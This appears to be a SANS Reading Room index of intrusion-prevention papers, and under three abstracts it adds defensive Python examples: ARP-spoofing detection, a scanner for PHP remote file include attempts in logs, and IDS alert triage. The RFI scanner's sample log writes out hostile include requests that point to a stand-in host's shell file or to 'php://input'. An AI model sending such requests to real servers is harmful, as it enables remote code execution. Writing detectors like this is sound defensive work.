SANS InfoSec Reading Room - Intrusion Prevention

Most of the computer security white papers in the Reading Room have been written by students seeking GIAC certification to fulfill part of their certification requirements and are provided by SANS as a resource to benefit the security community at large. SANS attempts to ensure the accuracy of information, but papers are published "as is". Errors or inconsistencies may exist or may be introduced over time as material becomes dated. If you suspect a serious error, please contact webmaster@sans.org.


Featuring 20 papers as of May 21, 2013
PDF Beating the IPS
By: Michael Dyrmose (posted on March 15, 2013)
Firewalls and Intrusion Prevention Systems (IPS) are core equipment in any enterprise or organization's network infrastructure.
PDF Web Log Analysis and Defense with Mod_Rewrite
By: Rick Wanner (posted on March 15, 2013)
Anybody who has been tasked with defending a production web server has quickly realized that the volume of logs generated, often measuring in gigabytes or terabytes a day, defies analysis even with the use of a good event management solution.
PDF An Analysis of the Snort Data Acquisition Modules
By: Christopher Murphy (posted on November 8, 2012)
Snort is an open-source Intrusion Detection System (IDS) that runs on Linux, UNIX, BSD variants and Windows.
PDF Mitigating Browser Based Exploits through Behavior Based Defenses and Hardware Virtualization
By: Joseph Faust (posted on October 7, 2011)
Hardly a day or week goes by without a headline story about an organization being compromised and infiltrated by attackers.
PDF Interception and Automating Blocking of Malicious Traffic Based on NDIS Intermediate Driver
By: Lee Ling Chuan (posted on June 30, 2011)
Over the past years, the number of malicious programs developed for illegal purposes has grown rapidly. The Monthly Malware Statistics, January 2011 (Zakorzhevsky, 2011) by Kaspersky Lab announced that there are over ten million viruses in circulation, most developed in January 2011.
PDF Animal Farm: Protection From Client-side Attacks by Rendering Content With Python and Squid.
By: TJ OConnor (posted on February 22, 2011)
Client-side attacks target vulnerabilities in applications and continue to grow at a faster rate than operating system or server-side attacks (SANS, 2010). Server-side applications typically reside behind several server-side controls and, hopefully, intrusion detection and prevention systems. In contrast, client-side attacks target the application on the end-user machine. End-user workstations typically have considerably less protection and fewer intrusion detection mechanisms than the more tightly controlled server-side applications, and they have proven to be an attractive target for attackers. As a result, client-side vulnerabilities have outnumbered server-side vulnerabilities since 2005 (CORE, 2010).
PDF Reducing Organizational Risk Through Virtual Patching
By: Joseph Faust (posted on January 11, 2011)
Software patching for IT departments across the organizational landscape has always been an integral part of maintaining functional, usable and stable software. Historically the traditional patch cycle has focused on fixing or resolving issues which affect functionality. In recent years, with the advancement of more sophisticated and targeted threats occurring in quicker cycles, this focus is dramatically changing (Risk Assessment – Cisco, n.d.; Executive Office of The United States, 2005). Corporations and governments now have a greater understanding of the potential losses and expenses incurred by not maintaining application security and are moving towards an increased focus on patching and security (Epstein, Grow & Tschang, 2008). With organizations' reputations, consumer confidence and corporate secrets at risk, corporations and governments are recognizing the need to address vulnerabilities at a much faster pace than they historically have (Chan, 2004). Over roughly the last ten years, the length of time between the documentation of a given vulnerability in a piece of software and the development of a working exploit for that weakness has decreased tremendously. According to Andrew Jaquith, senior analyst at Yankee Group, the average time between vulnerability discovery and the release of exploit code is less than one week ("Shrinking time from," 2006). It has also been identified that "99% of intrusions result from exploitation of known vulnerabilities or configuration errors where countermeasures were available" ("Risk reduction and," 2010). Clearly these statistics alone can prove daunting for many businesses trying to keep pace and maintain proper defenses against the bad guys.
PDF Detecting and Responding to Data Link Layer Attacks
By: TJ OConnor (posted on October 15, 2010)
In this paper, we examine techniques for identifying signatures and anomalies associated with attacks against the data link layer on both wired and wireless networks. Methods for signature-based detection and anomaly-based detection are not new. Intrusion detection systems such as Snort are quite capable of detecting some of the known data link layer attacks and include a mechanism for integrating Intrusion Prevention System (IPS) solutions. This paper does not advocate against the use of these solutions in organizations. What we present can augment your existing capabilities by detecting attacks to which your IDS may be blind.
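As an added example (not code from O'Connor's paper), the Python below runs the two kinds of check the abstract refers to over constructed Ethernet/ARP frames: a signature check, where the Ethernet source MAC disagrees with the ARP sender hardware address, and an anomaly check, where an IP address already bound to one MAC suddenly claims another. The frame builder, addresses and the first-seen binding policy are illustrative assumptions; no real traffic is used.

```python
import struct

# Wire formats in network byte order. Frames built below are test fixtures, not captures.
ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def fmt_mac(raw):
    return ":".join(f"{x:02x}" for x in raw)


def fmt_ip(raw):
    return ".".join(str(x) for x in raw)


def build_arp(eth_src, op, sha, spa, tha, tpa, eth_dst="ff:ff:ff:ff:ff:ff"):
    """Build an Ethernet+ARP frame from string addresses (constructed test input)."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))

    def ip(s):
        return bytes(int(x) for x in s.split("."))

    eth = ETH_HDR.pack(mac(eth_dst), mac(eth_src), ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not a complete ARP frame."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, src, etype = ETH_HDR.unpack_from(frame, 0)
    if etype != ETHERTYPE_ARP:
        return None
    _ht, _pt, _hl, _pl, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    return {"eth_src": fmt_mac(src), "op": op, "sha": fmt_mac(sha), "spa": fmt_ip(spa),
            "tha": fmt_mac(tha), "tpa": fmt_ip(tpa)}


class ArpMonitor:
    """Learns IP-to-MAC bindings on a segment and alerts on two ARP spoofing tells."""

    def __init__(self):
        self.bindings = {}  # ip -> mac, learned from the first frame that carries it

    def inspect(self, frame):
        a = parse_arp(frame)
        if a is None:
            return []
        alerts = []
        # Signature: Ethernet source MAC disagrees with the ARP sender hardware address.
        if a["eth_src"] != a["sha"]:
            alerts.append(f"arp-header-mismatch: eth src {a['eth_src']} != ARP sha {a['sha']} for {a['spa']}")
        # Anomaly: an IP we already know moves to a different MAC (cache poisoning / MITM).
        known = self.bindings.get(a["spa"])
        if known is None:
            self.bindings[a["spa"]] = a["sha"]
        elif known != a["sha"]:
            alerts.append(f"arp-binding-change: {a['spa']} moved from {known} to {a['sha']}")
        return alerts


if __name__ == "__main__":
    mon = ArpMonitor()
    gw = build_arp("00:11:22:33:44:55", ARP_REPLY, "00:11:22:33:44:55", "10.0.0.1",
                   "aa:bb:cc:dd:ee:01", "10.0.0.10")
    bad = build_arp("de:ad:be:ef:00:01", ARP_REPLY, "de:ad:be:ef:00:01", "10.0.0.1",
                    "aa:bb:cc:dd:ee:01", "10.0.0.10")
    for frame in (gw, bad):
        print(mon.inspect(frame))
```

The binding table is the state a stateless signature engine lacks: the second frame is a well-formed ARP reply that only looks wrong because the monitor remembers who 10.0.0.1 was. Learning the first binding seen is the weak point (an attacker who speaks first wins), so in practice the table is seeded from a known-good inventory rather than from traffic.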
PDF Smart IDS - Hybrid LaBrea Tarpit
By: Cristian Ruvalcaba (posted on December 28, 2009)
The importance of IDS in corporate defense is seen as an ever-growing necessity. Major strides have been made in numerous IDS tools, but some have reached a stalemate. The next evolutionary step in IDS would involve the concept of a 'Smart Intrusion Detection System (IDS)', one that generates signatures. The question of how to generate these signatures becomes instrumental, and can involve a number of different components. In this case, it could involve a tool that uses a hybrid LaBrea concept.
PDF A Multi-Perspective View of PHP Remote File Include Attacks
By: Dennis Schwarz (posted on November 10, 2009)
This paper describes the mechanics of an RFI (remote file include) attack by doing a code analysis and an attack walk-through on a vulnerable application. Detecting an attack is discussed by writing sample IDS signatures and looking at related log files.
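The log-file side of the detection the abstract mentions, as an added example that is not from Schwarz's paper: a Python scanner over constructed Apache-style access log lines that flags any query parameter whose decoded value is a remote URL (the classic `include($_GET['page'])` target) or a PHP stream wrapper that yields attacker-controlled code. This is the same `=http://` condition a content-matching IDS signature would carry, plus a second round of percent-decoding so that double-encoded payloads are not missed. The log lines, addresses and the wrapper list in `REMOTE_RE` are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/NCSA combined log format; only the request field matters for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+'
)
# A value that include()/require() would fetch remotely (RFI proper) or through a stream
# wrapper that turns request data into code (same attack class, local variant).
REMOTE_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect|phar)://', re.I)

# Constructed sample log lines (not from any real server); 203.0.113.0/24 and 198.51.100.0/24
# are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Nov/2009:13:55:36 -0500] "GET /index.php?page=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Nov/2009:13:55:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Nov/2009:13:56:02 -0500] "GET /index.php?page=http%253A%252F%252F203.0.113.99%252Fc.txt HTTP/1.1" 200 512 "-" "curl/7.19"',
    '203.0.113.5 - - [10/Nov/2009:13:56:10 -0500] "POST /index.php?page=php://input HTTP/1.1" 200 512 "-" "curl/7.19"',
    'this line is not in log format',
]


def parse_line(line):
    """Split one access-log line into its fields plus the once-decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["uri"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # one level of %-decoding
    return rec


def rfi_hits(line):
    """Return one hit per parameter whose value looks like a remote or wrapper include target."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = []
    for name, value in rec["params"]:
        target = unquote(value)  # second decode catches double-encoded payloads
        if REMOTE_RE.match(target):
            hits.append({"src": rec["ip"], "path": rec["path"], "param": name,
                         "target": target, "status": rec["status"]})
    return hits


def scan(lines):
    return [hit for line in lines for hit in rfi_hits(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['path']} ?{hit['param']}= {hit['target']} (HTTP {hit['status']})")
```

The trailing `?` on the first payload is the attacker's usual trick to turn whatever the vulnerable script appends (for example `.php`) into a query string on the remote server; it is preserved in the hit so an analyst sees the exact fetch. The HTTP status is kept because a 200 on an RFI request is a stronger signal than a 404.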
PDF Efficiently Deducing IDS False Positives Using System Profiling
By: Michael Karwaski (posted on November 9, 2009)
How to create a simple, static inventory database and compare security alerts against it to see whether they relate to the host in question. This allows greater visibility into which alerts are actually relevant to the end user's network.
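An added example (not Karwaski's own code) of the inventory-versus-alert comparison described above: a Python script holds a constructed static host inventory and classifies each constructed alert as relevant, irrelevant for a stated reason (wrong OS, no listener on the port, wrong product) or unknown host. The alert fields `target_os` and `target_product` are assumed to come from signature metadata; the inventory, alerts and verdict names are illustrative assumptions.

```python
from dataclasses import dataclass


@dataclass
class Host:
    ip: str
    os: str
    services: dict  # listening port -> product name, as recorded in the inventory


# Constructed static inventory; in practice a table populated from asset scans.
INVENTORY = {
    "10.0.0.10": Host("10.0.0.10", "linux", {22: "openssh", 80: "apache"}),
    "10.0.0.20": Host("10.0.0.20", "windows", {445: "smb", 3389: "rdp"}),
}

# Constructed alerts. target_os / target_product are assumed to be filled from the
# signature's metadata; None means the signature is generic.
SAMPLE_ALERTS = [
    {"sig": "WEB-IIS cmd.exe access", "dst": "10.0.0.10", "dport": 80,
     "target_os": "windows", "target_product": "iis"},
    {"sig": "WEB-PHP remote file include attempt", "dst": "10.0.0.10", "dport": 80,
     "target_os": None, "target_product": "apache"},
    {"sig": "NETBIOS SMB overflow attempt", "dst": "10.0.0.20", "dport": 445,
     "target_os": "windows", "target_product": "smb"},
    {"sig": "SSH brute force attempt", "dst": "10.0.0.20", "dport": 22,
     "target_os": None, "target_product": "openssh"},
    {"sig": "WEB-MISC scanner probe", "dst": "10.0.0.99", "dport": 80,
     "target_os": None, "target_product": None},
]


def triage(alert, inventory):
    """Classify one alert against the inventory; anything not provably irrelevant stays relevant."""
    host = inventory.get(alert["dst"])
    if host is None:
        return "unknown-host"            # not inventoried: needs a human, not a suppression
    if alert["target_os"] and alert["target_os"] != host.os:
        return "irrelevant-os"           # exploit targets an OS this host does not run
    product = host.services.get(alert["dport"])
    if product is None:
        return "irrelevant-port-closed"  # nothing listens there, so the payload cannot land
    if alert["target_product"] and alert["target_product"] != product:
        return "irrelevant-product"      # right port, wrong software behind it
    return "relevant"


def triage_all(alerts, inventory):
    return [(a["sig"], triage(a, inventory)) for a in alerts]


if __name__ == "__main__":
    for sig, verdict in triage_all(SAMPLE_ALERTS, INVENTORY):
        print(f"{verdict:24s} {sig}")
```

A verdict of irrelevant is only as trustworthy as the inventory is fresh: a stale entry turns a real alert into a suppressed one. Treat "unknown-host" and "irrelevant-port-closed" as queues to review (the host may be new, or a service may have appeared since the last scan) rather than as alerts to discard.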
PDF Era of Spybots - A Secure Design Solution Using Intrusion Prevention Systems
By: Siva Kumar (posted on October 23, 2008)
This paper is presented in the form of a case study. It utilizes a fictitious company, GIAC Enterprises (GIACE), a growing small retail company whose clients span the nation. In early spring GIACE was compromised by the Spybot worm, which caused a business outage.
PDF Intrusion Prevention with L7-Filter
By: Rui Santos (posted on August 19, 2008)
This paper examines the possibility of using L7-filter as an intrusion prevention tool.
PDF Intrusion Detection and Prevention In-sourced or Out-sourced
By: Vince Fitzparick (posted on July 30, 2008)
PDF Host Intrusion Prevention Systems and Beyond
By: Jonathan Chee (posted on June 24, 2008)
PDF Network IDS & IPS Deployment Strategies
By: Nicholas Pappas (posted on April 11, 2008)
Information systems are more capable today than ever before. Society increasingly relies on computing environments ranging from simple home networks, commonly attached to high speed Internet connections, to the largest enterprise networks spanning the entire globe. Filing one's tax return, shopping online, banking online, or even reading news headlines posted on the Internet are all so convenient. This increased reliance and convenience, coupled with the fact that attacks are concurrently becoming more prevalent, has elevated the need to have security controls in place to minimize risk as much as possible.
PDF A Design for Building an IPS Using Open Source Products
By: Mike Smith (posted on October 30, 2006)
The goal of the research was to develop a design for an IPS that could be applied to any small to medium sized network.
PDF Intrusion Detection on a Large Network
By: Jason Botwick (posted on April 8, 2004)
This paper will describe in detail the steps for setting up and managing an intrusion detection system across a large corporate network. It will begin with a discussion of the potential problems and benefits of the use of a NIDS on a large network.
PDF Packet Level Normalisation
By: Ian Martin (posted on October 31, 2003)
This paper proposes that any Signature Based Passive Network Intrusion Detection (NID) deployment is incomplete without an 'In-line' 'Packet Level Normaliser' [1].
PDF A Summary of DoS/DDoS Prevention, Monitoring and Mitigation Techniques in a Service Provider Environment
By: Michael Glenn (posted on September 26, 2003)
This paper covers Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks and discusses techniques to prevent them, including good security policies, new/updated product security testing, patch management, spoofed packet dropping (uRPF) and firewall/IDS/IPS deployment in a service provider environment.